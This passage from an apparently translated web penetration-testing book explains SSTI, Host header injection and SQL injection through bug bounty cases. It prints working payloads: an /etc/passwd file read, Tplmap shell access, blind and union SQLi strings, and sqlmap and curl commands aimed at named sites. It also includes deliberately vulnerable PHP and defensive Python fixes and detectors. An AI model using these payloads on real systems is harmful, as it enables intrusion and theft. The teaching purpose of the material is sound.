From there, he tried to reset the password in order to see the output related to the first name and last name he had injected. From that result, it turned out that the application responded by executing the arithmetic.

Figure 175 Intel Application has Responded to the Input

In further experiments, Suleman successfully extended the execution to retrieve files located on the server where the application resides. This was evidenced by successfully retrieving the contents of /etc/passwd.

The payload he entered in the first name field was:

{php}$s=file_get_contents('/etc/passwd');var_dump($s);{/php}

By requesting a password reset again, the output of reading the file /etc/passwd was successfully obtained.

Figure 176 Reading /etc/passwd via SSTI

16.4. Server Side Template Injection with Tplmap

Tplmap is a tool that can be used to automate the exploitation of server-side template injection vulnerabilities. The tool was developed by Emilio and can be obtained from its official GitHub page at https://github.com/epinna/tplmap.

Technically, Tplmap is written in Python, so Python must be installed before using it.

To date, Tplmap itself can be used to exploit 15 template engines, consisting of Mako, Jinja2, Python (code eval), Tornado, Nunjucks, Pug, Dot, Marko, Javascript (code eval), Dust, EJS, Ruby (code eval), Slim, ERB, Smarty, PHP (code eval), Twig, Freemarker, Velocity.

The tool can be downloaded by running a fairly simple command such as the following:

git clone https://github.com/epinna/tplmap.git


Citing the Tplmap GitHub page, here is an example of the SSTI exploitation steps using Tplmap:

$ ./tplmap.py -u 'http://www.target.com/page?name=John'

As a simple note, -u is used to declare the URL address to be tested.

The output produced by the tool when an SSTI vulnerability is found in an application looks more or less like the following:

[+] Testing if GET parameter 'name' is injectable
[+] Smarty plugin is testing rendering with tag '{*}'
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag '${*}'
...
[+] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] Tplmap identified the following injection point:

  GET parameter: name
  Engine: Jinja2
  Injection: {{*}}
  Context: text
  OS: Linux
  Technique: render
  Capabilities:

   Shell command execution: ok
   Bind and reverse shell: ok
   File write: ok
   File read: ok
   Code evaluation: ok, python code

From this output, it appears that Tplmap successfully exploited the vulnerability in the target application. Technically, this vulnerability lies in the GET parameter "name".

On the other hand, Tplmap has also identified the template engine in use, which is Jinja2.

Having found that the target is susceptible to SSTI, testers can continue exploitation using the options available in the tool. In this case, testers can try to obtain remote code execution using the --os-shell option:

$ ./tplmap.py --os-shell -u 'http://www.target.com/page?name=John'
[+] Tplmap 0.5
    Automatic Server-Side Template Injection Detection and Exploitation Tool

[+] Run commands on the operating system.
linux $ whoami
www
linux $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh

16.5. References for Server-Side Template Injection

To deepen the material presented on SSTI, testers can refer to the following references:

• Server-Side Template Injection: RCE for the modern webapp - https://portswigger.net/kb/papers/serversidetemplateinjection.pdf
• Server-Side Template Injection Introduction & Example - https://www.netsparker.com/blog/web-security/server-side-template-injection/
• Exploiting Server Side Template Injection With Tplmap - https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf
• Payloads All The Things - Template Injection - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
• Uber.com may RCE by Flask Jinja2 Template Injection - https://hackerone.com/reports/125980
• [Intel] Bug Hunting in Web App - https://www.owasp.org/images/c/ce/OWASP-London20170928-Suleman_Malik-PDF.pdf
• Tplmap - https://github.com/epinna/tplmap


17. HOST HEADER INJECTION (HHI)

As is already known, a request sent from an application toward a server basically consists of the user's input (the link typed into the browser's address bar), followed by several key parameters such as the Host value, Content-Length (for POST/PUT requests), User-Agent (a marker of the particular browser in use), the intended path on the host (e.g. /login, /delete, or others), and a few other things such as Origin and Referer.

For example, when a user types the link http://destination.com/path/of/application into the address bar, the browser will automatically send an HTTP request such as the following:

GET /path/of/application HTTP/1.1
Host: destination.com
Accept: */*
User-Agent: zzz
Origin: destination.com

As seen in the small example above, when a visit to destination.com is made, the browser also sends a "Host" value in the request that is the same as the link entered in the address bar. This indirectly shows that the Host value sent in the request is a separate thing from the link entered in the browser's address bar. In summary, testers can look at the following simple picture:

Figure 177 Sample of Request

At the top right of the Burp Suite display, it can be seen that the full link is https://account.asus.com. Specifically, this section represents the input given by the user to the browser (via the address bar).

However, at the bottom left, there is also a "Host" parameter sent with the same domain as its value. Long story short, this parameter is called the "Host Header". Basically, the Host header tells the web server which virtual host is being used (if one has been configured). By default, the value of this Host header will always follow the link given by the user through the browser.

However, during application development, the value of the Host header is often not validated, which allows a tester to manipulate the Host value and then use it to trick a victim. When an application does not validate the value of the Host header, that application is said to be vulnerable to Host Header Injection.

17.1. Kinds of Host Header Injection

Some types of Host Header Injection commonly carried out by researchers are:

• Allowing a tester to redirect a victim's request to another link. In this case, the Host header is manipulated to divert the user to another link that they basically did not intend to visit. In reality, the risk here is relatively small because several stages must be passed by the tester before a user is successfully deceived into heading to the link that has been prepared.

• The second model is one that allows a tester to manipulate a link sent through the email server. Specifically, this has a higher level of risk because it can lead to an account takeover of users.

17.2. Host Header Injection - Redirection - Whisper Case

In this type, the Host Header Injection performed by a tester is "only" limited to diverting a user (victim) from the link they intended to visit to another link prepared by the attacker.

Technically, this requires a "position" in which the tester can intercept the victim's traffic. On this basis (among many others), this issue is considered to have a low level of risk.

To clarify the situation, we will discuss an issue found by a researcher with the nick 1N3 in the program owned by Whisper.

In general, when a user is about to visit Whisper's official application, the user will certainly visit whisper.sh. However, 1N3 proved that he was able to divert a user's request from whisper.sh to another link (in this case crowdshield.com) by modifying the value of the "Host Header".

Figure 178 Modifying the Host Header from Whisper.sh to Crowdshield.com

As seen in the figure, when the request is sent to the server, the server responds by shifting the link from whisper.sh toward crowdshield.com. This can be seen on the right side of the interceptor in the header named "Location".

17.3. Host Header Injection - Account Takeover - The Concept

The second technique of Host Header Injection is generally associated with Account Takeover and usually involves the "reset password" feature.

Password reset itself is a common feature for users of applications that offer open registration. As the name implies, this feature is expected to be used by users who have difficulty logging in because they cannot remember their password.

In a typical implementation, when a user requests a password reset, they automatically receive a unique token sent to their registered email. However, problems arise when the link sent from the server via email is changed because of the manipulation of the Host value by the tester.

For example, in the normal process, the user should receive a full link such as https://destination.com/index.php/password/do_reset?key=8d1f26586a46ff6a6aa384ab8a9. However, because the value of the Host header has been manipulated, the link sent from the server via email changes from destination.com to evil.com. Here is an example of the resulting link: https://evil.com/index.php/password/do_reset?key=8d1f26586a46ff6a6aa384ab8a9.

To be clear, observe the following picture:

Figure 179 Sample of Host Header Injection

From the picture, it appears that the host value changed from example.com to evil.com due to the Host header manipulation performed by the tester.

Note: the image is from SkeletonScribe.net, "Practical HTTP Host Header Attacks".

So how can this be attributed to "Account Takeover"?

Simply put, when a victim visits the link in question (which leads to evil.com), the tester's server automatically records a log of the victim's request. In this case, the tester's log will contain a token that the tester can use directly to reset the victim's password (remember that the token is a fresh token). Here is an example of the log obtained by the tester when a victim has clicked on the link modified through HHI:

Figure 180 Sample of Logs at the Assessor's Server

For information, when testers use Apache, the log can be found in /var/log/apache2/access.log.

17.3.1. Host Header Injection - Account Takeover - Mavenlink Case

On October 22, 2017, a researcher with the nick cablej found a quite interesting HHI issue in the program owned by Mavenlink.

On that occasion, he found that Mavenlink validated the Host value so that it only accepted the value "mavenlink.com". However, cablej manipulated it by "tricking" the validation so that it could be bypassed. The payload used was:

example.com?.mavenlink.com

After sending the manipulated payload to the server, Mavenlink's "reply" to the request included the manipulated Host value.

Figure 181 Bypassing the Protection of Host Header Injection

From there, the tester only needs to monitor the logs on his server to pick up the fresh token "transmitted" by deceived victims.
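The reset-link construction described in 17.3 and the bypass of a loose Host check from the Mavenlink case in 17.3.1, shown as an added example (not code from the book or from Mavenlink): the canonical host, allowlist and token are constructed, the loose check is an assumed shape since the report does not publish Mavenlink's code, and the bypass value is transposed onto the book's destination.com / evil.com example.

```python
"""Password-reset link built from the Host header (17.3) beside a hardened
version, including the loose validation that the Mavenlink case (17.3.1)
bypassed.

Added example, not code from the book or from Mavenlink. The canonical host,
token and allowlist are constructed; the Mavenlink-style bypass value is
transposed onto the book's destination.com / evil.com example.
"""
from urllib.parse import urlsplit

CANONICAL_HOST = "destination.com"
ALLOWED_HOSTS = {"destination.com", "www.destination.com"}
RESET_PATH = "/index.php/password/do_reset"


def reset_link_from_host_header(host_header, token):
    """Vulnerable: the e-mailed link is assembled from whatever Host value the
    reset request carried, so a manipulated Host moves the token elsewhere."""
    return f"https://{host_header}{RESET_PATH}?key={token}"


def host_looks_trusted_loose(host_header):
    """A suffix check of the kind the Mavenlink report shows being bypassed
    (assumed shape; the report does not publish Mavenlink's code):
    'evil.com?.destination.com' ends with the trusted name but is not it."""
    return host_header.lower().endswith(CANONICAL_HOST)


def host_is_trusted_strict(host_header):
    """Exact match against a configured allowlist after removing a port.
    Anything that is not exactly one of our names is rejected."""
    hostname = host_header.split(":", 1)[0].strip().lower()
    return hostname in ALLOWED_HOSTS


def reset_link_hardened(host_header, token):
    """Fixed: refuse untrusted Hosts (returns None so the caller can log and
    abort), and build the link from configuration, never from the header."""
    if not host_is_trusted_strict(host_header):
        return None
    return f"https://{CANONICAL_HOST}{RESET_PATH}?key={token}"


def link_destination(link):
    """Where a browser would really send the token: the URL's host part.
    For 'https://evil.com?.destination.com/...' that is evil.com, because
    everything after '?' is the query string."""
    return urlsplit(link).hostname


if __name__ == "__main__":
    token = "8d1f26586a46ff6a6aa384ab8a9"   # token from the book's example
    for host in ["destination.com", "evil.com", "evil.com?.destination.com"]:
        vulnerable = reset_link_from_host_header(host, token)
        print(f"{host!r:30} loose={host_looks_trusted_loose(host)!s:5} "
              f"strict={host_is_trusted_strict(host)!s:5} "
              f"vulnerable link goes to {link_destination(vulnerable)}")
```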

17.4. References for Host Header Injection

To deepen the understanding of the material presented on Host Header Injection, testers can refer to the following references:

• Web Servers and the Host Header: https://serversforhackers.com/c/webservers-host-header
• What Is a Host Header? https://www.itprotoday.com/devops-and-software-development/what-host-header
• Practical HTTP Host Header Attacks: https://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html
• Host Header Injection: https://lightningsecurity.io/blog/host-header-injection/
• [Whisper] Host Header Injection - Redirection: https://hackerone.com/reports/94637
• [Mavenlink] Password reset link injection allows redirect to malicious URL: https://hackerone.com/reports/281575


18. SQL INJECTION

SQL injection is one kind of attack against web applications that aims to gain access to a SQL-based database system. According to the Akamai State of the Internet Security Report for Q4 2017, SQL injection ranks first with a share of 50%. Then, in the OWASP Top 10 2017, SQL injection is in category A1 Injection, ranked first. Based on this data, it can be seen that SQL Injection is still one of the quite popular types of vulnerabilities and is common even in modern web applications.

[Chart: Web Apps Attack Frequency Q4 2017; y-axis 0% to 60%; categories SQL injection, LFI, XSS, RFI, PHPi, Others]

Figure 182 SQL Injection Rank from Akamai and OWASP

Simply put, a SQL injection attack occurs by exploiting a vulnerability in the input validation of an application (either web-based or mobile). Because of the lack of validation and filtering of the given input, the user's input is processed directly by the application and executed by the database. Through this vulnerability, a tester can enter SQL commands directly from the front-end through the vulnerable parameter, which finally "lets" the tester communicate with the database without having access to it and without needing the username and password used by the database itself.

In execution, SQL Injection attacks have quite harmful effects, such as enabling a person to retrieve data stored in the database, modify data, and delete data in the database. One example of the worst impact of a SQL injection attack is that it enables a person to take (or enumerate) the existing usernames and passwords of a web application, or even allows one to interact with the operating system used by the database.


In the attack, testers generally "must" look for inputs in the web-based application that have a "relationship" with SQL commands, for example features that display news, search features, and login features. After finding such features, in general the attacker will continue by entering a single quote ('), double quote ("), or semicolon (;) in the corresponding parameter to identify whether or not the parameter is vulnerable to SQL Injection.

An example test usually done by testers in the initial phase is something like .php?id=1'. When the application displays an error message, there is a possibility that the id parameter is vulnerable to SQL injection. As a simple note, the error generally appears because the application is not capable of handling special characters in the input such as the single quote (').

18.1. Kinds of SQL Injection

Technically, SQL Injection attacks come in several kinds, among them error-based SQL Injection, union-based SQL Injection, and blind SQL Injection. Each type of vulnerability certainly has different characteristics and exploitation actions. The following is a brief elaboration of the differences:

18.1.1. Error-Based SQL Injection

In error-based SQL Injection, the tester first sends SQL queries to the database through the vulnerable parameter. The query is then executed by the database and generates an error. This error is usually displayed in the web application; in practice, the error message itself helps and provides guidance to the tester in conducting further attacks.

Here is an example piece of code, written in the PHP programming language, for an article search process.

<?php
// Deliberately vulnerable example (as in the original): $search is
// concatenated straight into the SQL statement with no escaping.
$mysqli = new mysqli("localhost", "db_user", "db_pass", "app_db"); // placeholder connection details
$search = $_GET['search'];
echo "Search " . $search . " Most";

// A quote in $search breaks the statement; the database error is what
// error-based SQLi feeds on.
$result = $mysqli->query("select * from articles where title = $search");
echo "Search Results " . $result->num_rows . " Results";
?>


When explored further, it can be seen that the code is vulnerable to SQL injection. This is because the search parameter is sent directly to the query without sanitization or escaping. This situation allows someone to submit SQL queries directly, among them executing a SELECT command to download the entire database, including users' personally identifiable information (PII). In some cases it may also allow INSERT and UPDATE commands to create new data (including user accounts) or modify existing data.

In detail, error-based SQL injection can be divided into two concepts: the comment line concept and the tautology concept.

The comment line concept is used to make the database ignore the rest of a valid query. For example: SELECT * FROM news WHERE id_news = 1' OR 1=1 -- - The part of the query after the comment marker will not be processed by the database because it is considered a comment.

In the tautology concept, the injected query uses the OR conditional operator so that it always returns true. In this situation, the tester sends a value that is always true, such as 1=1 or 'a'='a'. For example: SELECT * FROM tb_user WHERE username = 'admin' AND password = 'password' OR 1=1'. This condition will certainly evaluate to true because 1=1 is always true. Thus, any authentication process is expected to be passed successfully.
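The vulnerable string-built query from the PHP listing above beside its parameterized form, with the comment-line and tautology concepts exercised against both, as an added example (not the book's code): it uses an in-memory SQLite database with constructed rows, and the table names are borrowed from the book's examples.

```python
"""Error-based SQLi: the book's string-built search query (18.1.1) beside a
parameterized version, plus the comment-line and tautology concepts.

Added example, not the book's PHP. It uses an in-memory SQLite database with
constructed rows so it runs offline; table and column names mirror the
book's 'articles' and 'tb_user' examples. SQLite treats '--' as a comment,
like MySQL, so the payloads discussed in the text behave the same way.
"""
import sqlite3


def make_db():
    """Constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO articles (title) VALUES
            ('Weather today'), ('Most wanted'), ('Unpublished draft');
        CREATE TABLE tb_user (username TEXT, password TEXT);
        INSERT INTO tb_user VALUES ('admin', 's3cret'), ('alice', 'hunter2');
    """)
    return conn


def search_vulnerable(conn, search):
    """Same defect as the book's PHP: user input is spliced into the SQL text,
    so a quote in 'search' ends the literal and the rest becomes SQL."""
    sql = f"SELECT * FROM articles WHERE title = '{search}'"
    return conn.execute(sql).fetchall()


def search_safe(conn, search):
    """Placeholder binding: the value travels separately from the SQL text and
    can never close the quote or start a comment."""
    sql = "SELECT * FROM articles WHERE title = ?"
    return conn.execute(sql, (search,)).fetchall()


def error_message_for(conn, search):
    """What error-based SQLi feeds on: a lone quote breaks the statement and
    the database's own error text comes back to the caller (and, in the
    book's PHP, onto the page)."""
    try:
        search_vulnerable(conn, search)
        return None
    except sqlite3.Error as exc:
        return str(exc)


def login_vulnerable(conn, username, password):
    """The tautology case from the text: OR 1=1 makes the WHERE clause true
    regardless of the password."""
    sql = (f"SELECT 1 FROM tb_user WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """Parameterized: the same input is compared as a plain string."""
    sql = "SELECT 1 FROM tb_user WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1 -- "            # comment line + tautology
    print("vulnerable search rows:", len(search_vulnerable(db, payload)))  # 3
    print("safe search rows:      ", len(search_safe(db, payload)))        # 0
    print("error leak:", error_message_for(db, "1'"))
    print("vulnerable login:", login_vulnerable(db, "admin", "x' OR 1=1 -- "))
    print("safe login:      ", login_safe(db, "admin", "x' OR 1=1 -- "))
```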

18.1.2. Blind SQL Injection

Technically, this is not much different from what has been described for error-based SQLi. However, the difference is that in Blind SQL Injection, even though a tester has managed to perform the injection, the application does not display any error message in the user's browser.

As a simple example, a tester uses the payload ' OR 1=1 --- + . If the statement evaluates to true, the browser will display the normal page. However, when it evaluates to false, the page will behave differently and show a different view. Here is an example piece of code written in PHP for an article search process, which does not display the data because no echo is performed.

<?php
// Deliberately vulnerable example (as in the original): $search is
// concatenated straight into the SQL statement with no escaping.
$mysqli = new mysqli("localhost", "db_user", "db_pass", "app_db"); // placeholder connection details
$search = $_GET['search'];
echo "Search " . $search . " Most";

$result = $mysqli->query("select * from articles where title = $search");
// the result is never echoed, so nothing from the query shows on the page
?>

It should be noted that this code is also vulnerable. However, exploiting it is a little more difficult than error-based SQLi because testers cannot see an error message in the output.

To make this easier to understand, the writers take a tutorial written on a blog called securityidiots. Say there is a link at http://www.vuln-web.com/gallery.php?id=1 where the "id" parameter is vulnerable to blind SQL Injection.

In this condition, testers can first try to enter a single quote after the value 1, so that the link becomes http://www.vuln-web.com/gallery.php?id=1'. In general, the application will not display an error message (because it is blind) and the page will load its content normally, without the slightest visible change resulting from this injection. However, the injection should be followed by adding a few characters such as -- after the single quote, so that the link becomes http://www.vuln-web.com/gallery.php?id=1'-- . Because the id parameter is vulnerable, the result of this injection is expected to show a small change in content (and certainly without displaying an error message).

After that, the usual next step is to inject a Boolean such as ' OR 1=1 so that the link becomes http://www.vuln-web.com/gallery.php?id=1' OR 1=1 -- - . The output of this injection will return the normal page, because 1=1 compares equal values and therefore evaluates to true. Further, when the injection uses the payload ' OR 1=0, the application should not display the normal page, because 1=0 compares different values and therefore evaluates to false.

Once such patterns have been found, the next step is to identify the length of the database name used by the target. To perform this test, the tester needs to brute force it while looking for changes in the web application's response behaviour.

' OR length(database())=1 -- + → Does not generate an error, but there are small changes (false)
' OR length(database())=2 -- + → Does not generate an error, but there are small changes (false)
' OR length(database())=3 -- + → Does not generate an error, but there are small changes (false)
' OR length(database())=4 -- + → Does not generate an error, but there are small changes (false)
' OR length(database())=5 -- + → Does not generate an error, but there are small changes (false)
' OR length(database())=6 -- + → Normal page load without any change (true)

In the brute force trial above, it can be seen that the behaviour changes on the 6th trial, which confirms that the database name is 6 (six) characters long.

After learning that the database name is 6 (six) characters long, the tester should brute force each character using the following character set:

(1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_+-.)

This in itself is done with the aim to get the character contained in the to-character

1 to 6 of the characters to a total of six (6) characters in the existing database.

For the record, if this step is done manually, it will be very time consuming because

should experiment one by one and requires patience and precision. The following

is an example:

' or substring(database(),1,1)='a' -- +  → Does not generate an error, but there are small changes (false)
' or substring(database(),1,1)='b' -- +  → Does not generate an error, but there are small changes (false)
' or substring(database(),1,1)='c' -- +  → Does not generate an error, but there are small changes (false)
' or substring(database(),1,1)='d' -- +  → Normal page load without any change (true)
' or substring(database(),2,1)='a' -- +  → Does not generate an error, but there are small changes (false)
' or substring(database(),2,1)='b' -- +  → Normal page load without any change (true)
' or substring(database(),3,1)='_' -- +  → Normal page load without any change (true)
' or substring(database(),4,1)='a' -- +  → Normal page load without any change (true)


' or substring(database(),5,1)='p' -- +  → Normal page load without any change (true)
' or substring(database(),6,1)='p' -- +  → Normal page load without any change (true)

Based on the experiments above, the database in use is named db_app. To obtain results faster, a tester can write a script to automate the work. Another alternative is to use sqlmap.

For brief information, Blind SQL Injection comes in two different forms, namely boolean-based and time-based.

18.1.3. Union-Based SQL Injection

In general, union-based SQL injection is a SQL injection technique that makes use of the UNION operator, which combines the results of two or more SELECT statements into a single result set.

The combined results are returned as part of the HTTP response and then displayed in the browser. Here is a pseudocode example of an injection using the union-based technique:

SELECT * FROM tb_gallery WHERE id = 1 UNION SELECT 1, 2, database(), user() #

Put simply, when the above query is executed, the vulnerable application displays the gallery content and, alongside it, the name of the database and the database user in use.

18.2. Basic Concept of SQL Injection Attack

Just like with Cross Site Scripting, in general a tester needs to look for features with input and output in an application in order to launch a SQL Injection attack. Examples of features with inputs and outputs are search features, comment features, chat features, ticketing features, and the like.

In execution, the steps taken by a tester can be carried out automatically or manually. For the automatic way, the tester can use various available tools such as sqlmap, SQL Ninja, and others.


18.3. Sample Cases

18.3.1. Error Based SQL Injection - Bootcamp.Nutanix.com Case

In September 2018, a researcher named Muhammad Khizer Javed succeeded in finding an Error-Based SQL Injection vulnerability on one of the portals owned by Nutanix.

After finishing recon and finding the portal bootcamp.nutanix.com, he came across a login page that caught his attention. Long story short, when he entered an arbitrary email address and password, Javed did not get any information back.

Request:

POST /bootcamp/login HTTP/1.1
Content-Type: application/json
Content-Length: 74
Referer: https://bootcamp.nutanix.com/
Host: bootcamp.nutanix.com
Connection: Keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

{"email":"Email@email.com","password":"passwordlol"}

Not stopping there, Javed then entered 1\' in the email field, hoping to get a SQL error message. Interestingly, the application returned an error response in the code parameter.

Figure 183 Trying to Inject the Parameters


Response:

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 301
ETag: W/"12d-ZLo463k+S1SW5Z9MTAnhrr4EGvI"
Date: Mon, 16 Jul 2018 18:20:13 GMT
Connection: keep-alive

{"code":"ER_PARSE_ERROR","errno":1064,"sqlMessage":"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1","sqlState":"42000","index":0,"sql":"SELECT id from Users WHERE email = \"1'\'\' AND password = \"'\""}

Next, Javed tried to supply a payload that would extract information about the SQL version used by the target. The payload was as follows:

a\" and (extractvalue(1,concat(0x0a,@@version)))#

In its response, the web application "served" the request by displaying the value 8.0.11, which is the version of the database used by the target:

Figure 184 Trying to Look at the SQL Version

Based on the two experiments above, it can be concluded that the email parameter is vulnerable to SQL Injection. To speed up the attack process, Javed used sqlmap to obtain the databases present on the target.

To carry out SQL injection with sqlmap, the step required is to copy the request from Burp Suite and save it to file.txt (any text editor can be used). Then place the * character in the value of the parameter that is to be injected automatically.

Here is an example of the request stored in file.txt (with the email parameter value replaced by the asterisk).


POST /bootcamp/login HTTP/1.1
Content-Type: application/json
Content-Length: 74
Referer: https://bootcamp.nutanix.com/
Host: bootcamp.nutanix.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

{"email":"*","password":"passwordlol"}

Once the request is stored in file.txt, the next step is to run sqlmap with the following command:

sqlmap -r file.txt --risk 3 --level 5 --dbs

Thereafter, the tester only needs to wait until sqlmap reports a positive result (if the target is indeed vulnerable). On that occasion, Javed obtained the list of databases present in the target's DBMS:

Figure 185 SQL Injection Automation with sqlmap

18.3.2. Common Blind SQL Injection Attack - Zomato Case

As a recap, in contrast with error-based SQL Injection, which clearly provides "error" information, in blind SQL Injection a tester has to perform many trials to reach the desired output, as noted in the basic concept section earlier.

In December 2017, a researcher with the nick gerben_javado managed to find a Blind SQL Injection vulnerability in an on-premises Zomato application located at Zomato.com. On that occasion, javado found that the ENTITY_ID parameter was vulnerable to injection.

The experiment he conducted was to supply the payload 1 or if(mid(@@version,1,1)=5,1,2)=2%23. The purpose of this payload is to find out the first character of the database version in use.

If the target server uses a MySQL database of version 5.x.x, then this injected condition evaluates to true, because the first character indeed has the value five (5). The response from the application in that case is the return code 200 OK.

Furthermore, when javado injected the same payload with the comparison changed to mid(@@version,1,1)=4, the output was a 500 error return code. This is false because the first character of the MySQL version is not 4 but 5, so the response generated is a 500 error.

Here is the method used by javado in the testing he carried out:

curl -H 'Host: www.zomato.com' -H 'Cookie: PHPSESSID=XXXXX' 'https://www.zomato.com/████.php?ENTITY_TYPE=restaurant&ENTITY_ID=1+or+if(mid(@@version,1,1)=5,1,2)=2%23' -k

18.3.3. Blind SQL Injection Attack via User-Agent - Private Program

It is common knowledge among testers that, when searching for SQL Injection vulnerabilities, the likely location is the parameters of an application, whether in the POST or the GET method. However, a researcher with the nick fr0stNuLL showed something interesting by finding a Blind SQL Injection vulnerability via the User-Agent, which, as is well known, is one of the headers of an HTTP request.

For the record, the User-Agent is generally used to convey information about the OS and the browser used by the client.

In this situation, fr0stNuLL tried to see the difference between supplying a single quote (') in the User-Agent and not adding anything to it. Long story short, nothing other than "OK" appeared in the response when a simple POST request was sent.

Figure 186 Normal Response - without any single quote

Then, when the single quote special character was placed in the User-Agent that was sent, the application returned a distinctive response, namely Unauthorized.

Figure 187 Unauthorized Response after injecting the User-Agent

Judging from the results, this certainly seems strange, because the User-Agent value should not affect the response. From here, fr0stNuLL realized that most likely the User-Agent was recorded in the database, so that whenever a request is sent, the User-Agent used by the visitor is matched against the User-Agents contained in the database.

For the next step, fr0stNuLL tried to inject the payload ' AND '1'='1 in the hope of obtaining a true value in the response (the payload aims to make the condition true). Interestingly, the application returned the OK response, as shown in the following figure:


Figure 188 Injecting with "True" Payload - Success

To make sure that this parameter is really vulnerable to SQL Injection, fr0stNuLL also tried changing the injected payload to ' AND '1'='2, for which the output should be false (because the value 1 is not the same as the value 2).

When this payload was sent, the application gave the Unauthorized response, as shown in the following figure:

Figure 189 Injecting with "False" Payload - Success

Seeing this, it can be ascertained that the application is indeed vulnerable to (blind) SQL Injection via the User-Agent.

To extract more information, fr0stNuLL then tried to find out the version of the database used by the target at the time. The payload used was ' and substring(@@version,1,1)=1='1''.

The purpose of this payload is to find out the value of the first character of the database version used by the target. If the first character is 1, it produces the OK response; if not, it produces Unauthorized.

Here is an example of the injection to find the first character of the database version:


Figure 190 Injection Attempt to Find out the Database Name

And what about the second character? The tester goes back to the initial stage and repeats it, this time entering the payload: ' and substring(@@version,2,1)=1='1''

The meaning of this payload is to check whether the 2nd character of the database version is the digit 1 or not. Long story short, the second argument of substring is the position of the character (for example the first, second, third character, and so on), while the value on the right-hand side is the character value being searched for.

' or substring(@@version,2,1)='a' -- +  → Does not generate an error, but produces the output Unauthorized, so the second character is not "a".
' or substring(@@version,5,1)='x' -- +  → Does not generate an error, but produces the output Unauthorized, so the fifth character is not "x".
' or substring(@@version,9,1)='M' -- +  → Does not generate an error, but produces the output "OK", so the ninth character is certainly "M".
' or substring(@@version,14,1)='d' -- +  → Does not generate an error, but produces the output "OK", so the fourteenth character is certainly "d".

And so on until all of the characters are obtained.

It is indeed quite time consuming when done manually, so inevitably one has to write a small, simple script to automate things. The experiments were carried out over uppercase characters, lowercase characters, numbers, and symbols such as the following:

( 1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_+-. )

Armed with these experiments, fr0stNuLL finally managed to obtain the database version in use, namely 10.1.21-MariaDB.
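Seen from the defensive side, the manual brute force in 18.1.2 and the User-Agent probing above share one signature: a single client sends many near-identical requests whose payload changes by one position index or one compared character at a time, and the response flips between two states. The following is an added example written for this edition, not code from the book or from the researchers it cites. It parses constructed Apache "combined" log lines (the log format, the token list and the per-IP threshold are assumptions), URL-decodes the request target the way a PHP or Express backend would, scans both the target and the User-Agent for the injection tokens used in this chapter, and raises one alert per client IP that crosses the threshold.

```python
"""Spot blind SQL injection probes in web server access logs.

Added example, not taken from the book. Log lines below are constructed.
"""
import re
import urllib.parse
from collections import defaultdict

# Apache/nginx "combined" format:
# ip ident user [time] "METHOD target PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$'
)

# Injection tokens seen in this chapter, labelled so that alerts stay readable.
SQLI_PATTERNS = {
    "length(database())": re.compile(r"length\s*\(\s*database\s*\(\s*\)\s*\)", re.I),
    "substring(": re.compile(r"\b(substring|substr|mid)\s*\(", re.I),
    "@@version": re.compile(r"@@version|\bversion\s*\(\s*\)", re.I),
    "sleep(": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "extractvalue(": re.compile(r"\bextractvalue\s*\(", re.I),
    "union select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    # ' AND '1'='1 / ' OR 1=1 style boolean probes (the User-Agent case)
    "quoted boolean": re.compile(r"'\s*(and|or)\s*'?\d+'?\s*=\s*'?\d+", re.I),
}


def parse_line(line):
    """Return ip, method, decoded target, status and user_agent, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target, status, ua = m.groups()
    # Decode %xx and '+' as the backend does, otherwise payloads stay hidden in the log.
    return {"ip": ip, "method": method, "target": urllib.parse.unquote_plus(target),
            "status": int(status), "user_agent": ua}


def find_sqli_tokens(text):
    """Sorted labels of every injection pattern present in text (empty if clean)."""
    return sorted(label for label, rx in SQLI_PATTERNS.items() if rx.search(text))


def analyse(lines, threshold=3):
    """Group suspicious requests per client IP; alert once hits reach the threshold.

    One hit can be a false positive (a search for "sleep("); a burst from one IP
    is the shape of the enumeration described in the text.
    """
    per_ip = defaultdict(lambda: {"hits": 0, "tokens": set(), "statuses": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tokens = find_sqli_tokens(rec["target"]) + find_sqli_tokens(rec["user_agent"])
        if not tokens:
            continue
        entry = per_ip[rec["ip"]]
        entry["hits"] += 1
        entry["tokens"].update(tokens)
        entry["statuses"].add(rec["status"])
    alerts = [{"ip": ip, "hits": e["hits"], "tokens": sorted(e["tokens"]),
               "statuses": sorted(e["statuses"])}
              for ip, e in per_ip.items() if e["hits"] >= threshold]
    return sorted(alerts, key=lambda a: a["ip"])


# Constructed sample log. 203.0.113.7 runs the 18.1.2 enumeration against a query
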